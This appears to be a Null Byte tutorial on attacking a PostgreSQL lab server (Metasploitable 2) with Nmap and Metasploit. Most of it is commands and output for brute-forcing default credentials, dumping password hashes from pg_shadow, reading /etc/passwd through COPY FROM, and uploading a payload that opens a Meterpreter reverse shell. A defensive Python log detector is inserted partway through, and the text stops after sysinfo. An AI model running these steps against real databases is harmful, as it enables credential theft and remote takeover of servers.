
How to Collect Information About PostgreSQL Databases with Metasploit « Null Byte :: WonderHowTo



Attacks against databases have become one of the most popular and lucrative activities for hackers in recent years. New data breaches seem to surface every week, and even with all that attention, databases remain a prime target. All of these attacks have to start somewhere, so in this guide we will explore a variety of methods for gathering information about PostgreSQL databases with Metasploit.

PostgreSQL is an open source relational database management system (RDBMS) that uses the SQL language, along with many other features, to handle a variety of data workloads. Originally developed for Unix, PostgreSQL runs on all major operating systems and is the default database for macOS Server.

PostgreSQL is known for its scope, reliability, data integrity, solid architecture and robust feature set, including the popular PostGIS geographic database extender. It is also ACID compliant and is backed by a dedicated open source community.

For the most part, PostgreSQL complies with the SQL language standards, but some syntax and functions differ slightly. It is often used for heavy workloads where concurrency and performance are a priority, and it offers modern security and recovery capabilities that matter in enterprise environments. Overall, PostgreSQL is a fantastic RDBMS that is both flexible and extensible.

Step 1: Use an Nmap Scan

In this guide we use Metasploitable 2 as the target and Kali Linux as the local machine. You can use the same or a similar setup.

After setting up the test lab, we first need to determine whether the PostgreSQL service is running on the target. To do this, we can run an Nmap scan against port 5432, the default port for PostgreSQL. Use the -p flag to specify the port and -sV to enable version detection:

  ~ # nmap -sV 10.10.0.50 -p 5432

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-10 11:41 CST
Nmap scan report for 10.10.0.50
Host is up (0.00064s latency).

PORT     STATE SERVICE    VERSION
5432/tcp open  postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 00:1D:09:55:B1:3B (Dell)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds

We can see that the PostgreSQL service is open on the target and is running a version in the range 8.3.0 - 8.3.7.


Step 2: Get Version Information

Metasploit has a number of modules we can use to gather useful information about PostgreSQL databases. Fire it up by typing msfconsole in the terminal.

  ~ # msfconsole

       =[ metasploit v5.0.87-dev                          ]
+ -- --=[ 2006 exploits - 1096 auxiliary - 343 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try setting it globally with setg RHOSTS x.x.x.x

msf5 > 

When loaded, we can use the search function to look for modules related to PostgreSQL:

  msf5 > search postgre

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   1   auxiliary/admin/http/rails_devise_pass_reset                2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   2   auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   3   auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   4   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   5   auxiliary/analyze/jtr_postgres_fast                                          normal     No     John the Ripper Postgres SQL Password Cracker
   6   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     Yes    PostgreSQL Database Name Command Line Flag Injection
   7   auxiliary/scanner/postgres/postgres_hashdump                                 normal     Yes    Postgres Password Hashdump
   8   auxiliary/scanner/postgres/postgres_login                                    normal     Yes    PostgreSQL Login Utility
   9   auxiliary/scanner/postgres/postgres_schemadump                               normal     Yes    Postgres Schema Dump
   10  auxiliary/scanner/postgres/postgres_version                                  normal     Yes    PostgreSQL Version Probe
   11  auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   12  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   13  exploit/multi/http/manage_engine_dc_pmp_sqli                2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   14  exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   15  exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   16  exploit/windows/misc/manageengine_eventlog_analyzer_rce     2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution
   17  exploit/windows/postgres/postgres_payload                   2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   18  post/linux/gather/enum_users_history                                         normal     No     Linux Gather User History

The first one we will cover gives us some information about the version that is running. It never hurts to double-check, since some exploits only work against certain versions. Load the module with the use command:

  msf5 > use auxiliary/scanner/postgres/postgres_version

Now let's look at the options to see the current settings:

  msf5 auxiliary(scanner/postgres/postgres_version) > options

Module options (auxiliary/scanner/postgres/postgres_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

We can leave all the defaults for now, but we do need to set the rhosts option to the IP address of our target:

  msf5 auxiliary(scanner/postgres/postgres_version) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

Now we just have to run it; use the command run to start it:

  msf5 auxiliary(scanner/postgres/postgres_version) > run

[*] 10.10.0.50:5432 Postgres - Version PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4) (Post-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

And we can see the version number is 8.3.1, which is a bit more specific than what Nmap returned.

Step 3: Brute-Force the Login

The next module we will look at attempts to brute-force the login to the PostgreSQL database using a list of default usernames and passwords. Load it with the use command:

  msf5 > use auxiliary/scanner/postgres/postgres_login

Let's take a look at these module options:

  msf5 auxiliary(scanner/postgres/postgres_login) > options

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                               Required  Description
   ----              ---------------                                                               --------  -----------
   BLANK_PASSWORDS   false                                                                         no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                             yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                     yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                         no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                         no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                         no        Add all users in the current database to the list
   PASSWORD                                                                                        no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                          no        Set to true to see query result sets
   RHOSTS                                                                                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5432                                                                          yes       The target port
   STOP_ON_SUCCESS   false                                                                         yes       Stop guessing when a credential works for a host
   THREADS           1                                                                             yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                        no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                         no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                          yes       Whether to print output for all attempts

This one has a few more options we could play with, but for now the defaults will do. Just set the remote host option again and we should be good to go:

  msf5 auxiliary(scanner/postgres/postgres_login) > set rhosts 10.10.0.50

rhosts => 10.10.0.50

Now we can start the module:

  msf5 auxiliary(scanner/postgres/postgres_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.0.50:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: :password@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: :admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or password)
[+] 10.10.0.50:5432 - Login Successful: postgres:postgres@template1
[-] 10.10.0.50:5432 - LOGIN FAILED: scott:@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: admin:@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
[-] 10.10.0.50:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can see it work through every username and password combination; most of them fail, but one login succeeds: the default postgres:postgres pair.

Step 4: Run SQL Queries

Instead of logging into the database directly, we can run SQL queries from another Metasploit module. Load the module:

  msf5 > use auxiliary/admin/postgres/postgres_sql

And look at the options:

  msf5 auxiliary(admin/postgres/postgres_sql) > options

Module options (auxiliary/admin/postgres/postgres_sql):

   Name           Current Setting   Required  Description
   ----           ---------------   --------  -----------
   DATABASE       template1         yes       The database to authenticate against
   PASSWORD       postgres          no        The password for the specified username. Leave blank for a random password.
   RETURN_ROWSET  true              no        Set to true to see query result sets
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          5432              yes       The target port
   SQL            select version()  no        The SQL query to execute
   USERNAME       postgres          yes       The username to authenticate as
   VERBOSE        false             no        Enable verbose output

Instead of setting the remote host option every time, we can use the command setg to set the option globally. This means that it will remain set when we switch to other modules unless we change it again.

  msf5 auxiliary(admin/postgres/postgres_sql) > setg rhosts 10.10.0.50

rhosts => 10.10.0.50 

The default query for this module selects the database version. Let's see what that looks like:

  msf5 auxiliary(admin/postgres/postgres_sql) > run

[*] Running module against 10.10.0.50

Query Text: 'select version()'
==============================

    version
    -------
    PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

[*] Auxiliary module execution completed

But we can set this option to any valid SQL we like. For example, the following query returns the username and password hash of the current user from the pg_shadow catalog (note that the column is named usename, not username):

  SELECT usename, passwd FROM pg_shadow;

Let's set the option to this now:

  msf5 auxiliary(admin/postgres/postgres_sql) > set sql select usename, passwd from pg_shadow

sql => select usename, passwd from pg_shadow

And run the module again:

  msf5 auxiliary(admin/postgres/postgres_sql) > run

[*] Running module against 10.10.0.50

Query Text: 'select usename, passwd from pg_shadow'
===================================================

    usename   passwd
    -------   ------
    postgres  md53175bce1d3201d16594cebf9d7eb3f9d

[*] Auxiliary module execution completed

Now we can see the username and password hash of the current user.

Step 5: Dump the Hashes

Metasploit also has a module that quickly dumps all the password hashes in the database for us. Load it:

  msf5 > use auxiliary/scanner/postgres/postgres_hashdump

And see the options:

  msf5 auxiliary(scanner/postgres/postgres_hashdump) > options

Module options (auxiliary/scanner/postgres/postgres_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  postgres         yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS    10.10.0.50       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  postgres         yes       The username to authenticate as

Everything looks good at this point, and since we already set the remote host globally, we just need to run it:

  msf5 auxiliary(scanner/postgres/postgres_hashdump) > run

[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username  Hash
 --------  ----
 postgres  md53175bce1d3201d16594cebf9d7eb3f9d

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can see the query ran successfully and returned the password hash.

Step 6: Dump Schema Info

The next module tries to dump any schema information it can find in the database. This can be useful for getting a broad view of all the databases, tables and settings in use. Load the module:

  msf5 > use auxiliary/scanner/postgres/postgres_schemadump

And check the options:

  msf5 auxiliary(scanner/postgres/postgres_schemadump) > options

Module options (auxiliary/scanner/postgres/postgres_schemadump):

Name Current setting Mandatory description
------------------- -------- -----------
DATABASE postgres yes Database to verify against
DISPLAY_RESULTS true yes Display the results on the screen
PASSWORD postgres no The password for the specified username. Leave blank for a random password.
RHOSTS 10.10.0.50 yes Target host (s), CIDR identifier range or host file with syntax & # 39; file:  & # 39;
RPORT 5432 yes Target port
THREADS 1 yes Number of concurrent threads (max one per host)
USERNAME postgres yes The username to be verified as 

We can leave the defaults and start the module:

  msf5 auxiliary(scanner/postgres/postgres_schemadump) > run

[+] Postgres SQL Server Schema
Host: 10.10.0.50
Port: 5432
====================

--- []

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can see that it did not return anything this time, but it is still worth a shot to gather data like this for later use.

Step 7: Read System Files

We can also use Metasploit to read system files through the PostgreSQL database. Load the module:

  msf5 > use auxiliary/admin/postgres/postgres_readfile

And look at the options:

  msf5 auxiliary(admin/postgres/postgres_readfile) > options

Module options (auxiliary/admin/postgres/postgres_readfile):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RFILE     /etc/passwd      yes       The remote file
   RHOSTS    10.10.0.50       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

The default file to read is /etc/passwd, which will do for now. Let's kick it off:

  msf5 auxiliary(admin/postgres/postgres_readfile) > run

[*] Running module against 10.10.0.50

Query Text: 'CREATE TEMP TABLE hoieZbLAeCQ (INPUT TEXT);
COPY hoieZbLAeCQ FROM '/etc/passwd';
SELECT * FROM hoieZbLAeCQ'
======================================================================================================================

    input
    -----
    backup:x:34:34:backup:/var/backups:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    bind:x:105:113::/var/cache/bind:/bin/false
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    dhcp:x:101:102::/nonexistent:/bin/false
    distccd:x:111:65534::/:/bin/false
    ftp:x:107:65534::/home/ftp:/bin/false
    games:x:5:60:games:/usr/games:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    klog:x:103:104::/home/klog:/bin/false
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
    mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
    news:x:9:9:news:/var/spool/news:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    postfix:x:106:115::/var/spool/postfix:/bin/false
    postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    proftpd:x:113:65534::/var/run/proftpd:/bin/false
    proxy:x:13:13:proxy:/bin:/bin/sh
    root:x:0:0:root:/root:/bin/bash
    service:x:1002:1002:,,,:/home/service:/bin/bash
    sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
    statd:x:114:65534::/var/lib/nfs:/bin/false
    sync:x:4:65534:sync:/bin:/bin/sync
    sys:x:3:3:sys:/dev:/bin/sh
    syslog:x:102:103::/home/syslog:/bin/false
    telnetd:x:112:120::/nonexistent:/bin/false
    tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
    user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
[+] 10.10.0.50:5432 Postgres - /etc/passwd saved in /root/.msf4/loot/20191211120809_default_10.10.0.50_postgres.file_153011.txt
[*] Auxiliary module execution completed

We can see that the module first creates a temporary table, copies the contents of the requested file into it with COPY ... FROM, and then selects it back so it is displayed on screen. It also saves the file as loot for later use.

Let's try reading another file, say /etc/shadow this time. First set the option:

  msf5 auxiliary(admin/postgres/postgres_readfile) > set rfile /etc/shadow

rfile => /etc/shadow

Then run the module:

  msf5 auxiliary(admin/postgres/postgres_readfile) > run

[*] Running module against 10.10.0.50

[-] 10.10.0.50:5432 Postgres - Insufficient file permissions.
[*] Auxiliary module execution completed

This time we can see that it did not succeed, because the database server process does not have the file permissions needed to read /etc/shadow. But it is always worth a try.
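Seen from the database side, each of Steps 3 through 7 leaves a distinct trace in the PostgreSQL server log. The following is an added example for defenders (not part of the original article and not Metasploit code) that scans log lines for those shapes: a burst of failed password authentications from one client, a successful login right after such a burst, reads of pg_shadow, and COPY ... FROM a file path. It assumes log_line_prefix = '%m [%p] %u@%d %h ' with log_connections = on and log_statement = 'all'; the sample log lines are constructed to mirror the session above.

```python
"""Spot the PostgreSQL recon patterns from this tutorial in server log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed prefix '%m [%p] %u@%d %h ' (an assumption; adapt LINE_RE to your own prefix).
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ \S+ \[\d+\] "
    r"(?P<user>[^@\s]+)@(?P<db>\S+) (?P<client>\S+) (?P<level>[A-Z]+):\s+(?P<msg>.*)$"
)

FAILED_AUTH = 'password authentication failed for user "'
SUCCESS_AUTH = "connection authorized:"

# Statements the tutorial's modules issue once they have credentials:
# the hash dump via pg_shadow (Steps 4 and 5) and the file read via COPY ... FROM (Step 7).
SENSITIVE_SQL = (
    ("pg_shadow_read", re.compile(r"\bfrom\s+pg_shadow\b", re.I)),
    ("copy_from_file", re.compile(r"\bcopy\s+\S+\s+from\s+'[^']+'", re.I)),
)


def parse_line(line):
    """Return the fields of one log line, or None if it is not in the assumed format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%d %H:%M:%S")
    return rec


def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Scan log lines in order and return alert dicts.

    auth_burst:          at least `threshold` failed logins from one client inside `window`
                         (the shape of postgres_login working through its wordlists)
    success_after_burst: a successful login from a client that recently tripped auth_burst
    pg_shadow_read / copy_from_file: statements matching SENSITIVE_SQL
    """
    alerts = []
    failures = defaultdict(list)   # client -> [(ts, user), ...] still inside the window
    burst_at = {}                  # client -> ts at which auth_burst fired
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, msg = rec["ts"], rec["client"], rec["msg"]
        if rec["level"] == "FATAL" and FAILED_AUTH in msg:
            recent = [(t, u) for t, u in failures[client] if ts - t <= window]
            recent.append((ts, rec["user"]))
            failures[client] = recent
            if len(recent) >= threshold and client not in burst_at:
                burst_at[client] = ts
                alerts.append({"kind": "auth_burst", "client": client, "ts": ts,
                               "users": sorted({u for _, u in recent})})
        elif rec["level"] == "LOG" and msg.startswith(SUCCESS_AUTH):
            if client in burst_at and ts - burst_at[client] <= window:
                alerts.append({"kind": "success_after_burst", "client": client,
                               "ts": ts, "user": rec["user"]})
        elif rec["level"] == "LOG" and msg.startswith("statement:"):
            for kind, pattern in SENSITIVE_SQL:
                if pattern.search(msg):
                    alerts.append({"kind": kind, "client": client, "ts": ts, "user": rec["user"],
                                   "statement": msg[len("statement:"):].strip()})
    return alerts


# Constructed sample log (not a real capture): a short default-credential run against
# template1 from 10.10.0.1, then the pg_shadow dump and the /etc/passwd read.
SAMPLE_LOG = """\
2020-05-10 11:50:01.001 CST [4101] scott@template1 10.10.0.1 FATAL:  password authentication failed for user "scott"
2020-05-10 11:50:01.102 CST [4102] scott@template1 10.10.0.1 FATAL:  password authentication failed for user "scott"
2020-05-10 11:50:01.203 CST [4103] admin@template1 10.10.0.1 FATAL:  password authentication failed for user "admin"
2020-05-10 11:50:01.304 CST [4104] admin@template1 10.10.0.1 FATAL:  password authentication failed for user "admin"
2020-05-10 11:50:01.405 CST [4105] postgres@template1 10.10.0.1 FATAL:  password authentication failed for user "postgres"
2020-05-10 11:50:02.306 CST [4106] postgres@template1 10.10.0.1 LOG:  connection authorized: user=postgres database=template1
2020-05-10 11:50:05.000 CST [4107] postgres@template1 10.10.0.1 LOG:  statement: select usename, passwd from pg_shadow
2020-05-10 11:50:09.000 CST [4108] postgres@template1 10.10.0.1 LOG:  statement: CREATE TEMP TABLE hoieZbLAeCQ (INPUT TEXT); COPY hoieZbLAeCQ FROM '/etc/passwd'; SELECT * FROM hoieZbLAeCQ
2020-05-10 12:00:00.000 CST [4200] app@appdb 10.10.0.7 LOG:  statement: select count(*) from orders
""".splitlines()


def sample_alerts():
    """Run the detector over the constructed sample log."""
    return detect(SAMPLE_LOG)


if __name__ == "__main__":
    for a in sample_alerts():
        print(a["ts"], a["kind"], a["client"], a.get("user") or ",".join(a["users"]))
```

The benign query from 10.10.0.7 produces no alert; the threshold and window are starting points to tune against your own connection volume.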

Step 8: Send a Payload

The last module we will explore today is an exploit that attempts to upload and execute a payload on the target. First load the module:

  msf5 > use exploit/linux/postgres/postgres_payload

And view the options:

  msf5 exploit(linux/postgres/postgres_payload) > options

Module options (exploit/linux/postgres/postgres_payload):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS    10.10.0.50       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

Exploit target:

   Id  Name
   --  ----
   0   Linux x86

Everything looks good, but since this is an exploit we also have to set a payload. Use the show payloads command to list the payloads compatible with this module:

  msf5 exploit(linux/postgres/postgres_payload) > show payloads

Compatible Payloads
===================

   #   Name                                       Disclosure Date  Rank    Check  Description
   -   ----                                       ---------------  ----    -----  -----------
   0   generic/custom                                              normal  No     Custom Payload
   1   generic/debug_trap                                          normal  No     Generic x86 Debug Trap
   2   generic/shell_bind_tcp                                      normal  No     Generic Command Shell, Bind TCP Inline
   3   generic/shell_reverse_tcp                                   normal  No     Generic Command Shell, Reverse TCP Inline
   4   generic/tight_loop                                          normal  No     Generic x86 Tight Loop
   5   linux/x86/chmod                                             normal  No     Linux Chmod
   6   linux/x86/exec                                              normal  No     Linux Execute Command
   7   linux/x86/meterpreter/bind_ipv6_tcp                         normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   8   linux/x86/meterpreter/bind_ipv6_tcp_uuid                    normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   9   linux/x86/meterpreter/bind_nonx_tcp                         normal  No     Linux Mettle x86, Bind TCP Stager
   10  linux/x86/meterpreter/bind_tcp                              normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   11  linux/x86/meterpreter/bind_tcp_uuid                         normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   12  linux/x86/meterpreter/reverse_ipv6_tcp                      normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   13  linux/x86/meterpreter/reverse_nonx_tcp                      normal  No     Linux Mettle x86, Reverse TCP Stager
   14  linux/x86/meterpreter/reverse_tcp                           normal  No     Linux Mettle x86, Reverse TCP Stager
   15  linux/x86/meterpreter/reverse_tcp_uuid                      normal  No     Linux Mettle x86, Reverse TCP Stager
   16  linux/x86/metsvc_bind_tcp                                   normal  No     Linux Meterpreter Service, Bind TCP
   17  linux/x86/metsvc_reverse_tcp                                normal  No     Linux Meterpreter Service, Reverse TCP Inline
   18  linux/x86/read_file                                         normal  No     Linux Read File
   19  linux/x86/shell/bind_ipv6_tcp                               normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   20  linux/x86/shell/bind_ipv6_tcp_uuid                          normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   21  linux/x86/shell/bind_nonx_tcp                               normal  No     Linux Command Shell, Bind TCP Stager
   22  linux/x86/shell/bind_tcp                                    normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   23  linux/x86/shell/bind_tcp_uuid                               normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   24  linux/x86/shell/reverse_ipv6_tcp                            normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   25  linux/x86/shell/reverse_nonx_tcp                            normal  No     Linux Command Shell, Reverse TCP Stager
   26  linux/x86/shell/reverse_tcp                                 normal  No     Linux Command Shell, Reverse TCP Stager
   27  linux/x86/shell/reverse_tcp_uuid                            normal  No     Linux Command Shell, Reverse TCP Stager
   28  linux/x86/shell_bind_ipv6_tcp                               normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   29  linux/x86/shell_bind_tcp                                    normal  No     Linux Command Shell, Bind TCP Inline
   30  linux/x86/shell_bind_tcp_random_port                        normal  No     Linux Command Shell, Bind TCP Random Port Inline
   31  linux/x86/shell_reverse_tcp                                 normal  No     Linux Command Shell, Reverse TCP Inline
   32  linux/x86/shell_reverse_tcp_ipv6                            normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Let's use the popular Meterpreter reverse shell. Use the set command to select the payload:

  msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp

payload => linux/x86/meterpreter/reverse_tcp

We need to set the local host and local port options since this is a reverse shell. Set the lhost to the IP address of our local machine:

  msf5 exploit(linux/postgres/postgres_payload) > set lhost 10.10.0.1

lhost => 10.10.0.1 

And the lport to a port of your choosing:

  msf5 exploit(linux/postgres/postgres_payload) > set lport 4321

lport => 4321 

That should be everything we need, so let's kick it off:

  msf5 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.50:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/FKXyvnhM.so, should be cleaned up automatically
[*] Sending stage (985320 bytes) to 10.10.0.50
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.50:37662) at 2020-05-10 12:18:23 -0600

meterpreter >

We can see it start the handler, upload the payload to the target and, finally, open a session. We can now run commands such as sysinfo to verify that we have a shell on the target:

meterpreter > sysinfo

Computer     : metasploitable.localdomain
